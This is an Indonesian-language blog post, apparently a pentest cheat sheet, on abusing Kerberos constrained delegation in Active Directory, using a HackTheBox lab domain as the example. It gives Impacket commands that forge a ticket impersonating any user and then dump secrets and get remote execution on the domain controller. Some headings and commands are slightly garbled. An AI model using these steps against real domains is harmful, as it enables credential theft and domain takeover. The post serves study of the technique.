Post

[Kerberos] AllowToDelegate Abuse (Constrained Delegation)

Constrained delegation memungkinkan prinsipal untuk mengautentikasi sebagai pengguna mana pun ke layanan tertentu di komputer target.

Artinya, sebuah node dengan hak istimewa ini dapat meniru (impersonate) domain princial apa pun (termasuk Domain Admins) ke layanan tertentu pada komputer target.

Tujuan

  • Privilege escalation atau
  • lateral movement

Prasyarat

  • User dengan hak akses ReadGMSAPassword

Tools

  • Impacket

Tahapan eksploitasi

Step 1: Cek Hak Akses Dengan BloodHound

Pada contoh kasus kali ini, user SVC_INT.INTELLIGENCE.HTB memiliki hak akses constrained delegation ke komputer DC.INTELLIGENCE.HTB.

Bloodhound - allowtodelegate

Step 2: Ketahui SPN yang Dapat Diakses

Kita dapat mengetahui SPN yang didelegasikan pada suatu user pada Bloodhound.

Terlihat pada kasus ini SPN yang dapat didelegasikan untuk user SVC_INT adalah WWW/DC.INTELLIGENCE.HTB

Bloodhound - Delegate SPN

Step 3: Ketahui SPN yang Dapat Diakses

1
2
3
4
5
6
7
8
9
10
# Generate ticket baru sebagai user yang diinginkan
➜ getST.py -spn <SPN> -impersonate <user> <domai>/<username>:<password>@<ip-dc>
➜ getST.py -spn <SPN> -impersonate <user> <domai>/<username>@<ip-dc> -hashes <hash>

# Membuat variable KRB5CCNAME sebagai ticket untuk diakses oleh Impacketexport KRB5CCNAME=administrator.ccache 

# Gunakan ticket pada Impacket
➜ secretsdump.py -k -no-pass <domain>
➜ wmiexec.py -k -no-pass <domain>

Referensi

  • https://0xdf.gitlab.io/2021/11/27/htb-intelligence.html#get-ticket
  • https://www.guidepointsecurity.com/blog/delegating-like-a-boss-abusing-kerberos-delegation-in-active-directory/
  • http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html
  • https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation
  • https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#kerberos-constrained-delegation
This post is licensed under CC BY 4.0 by the author.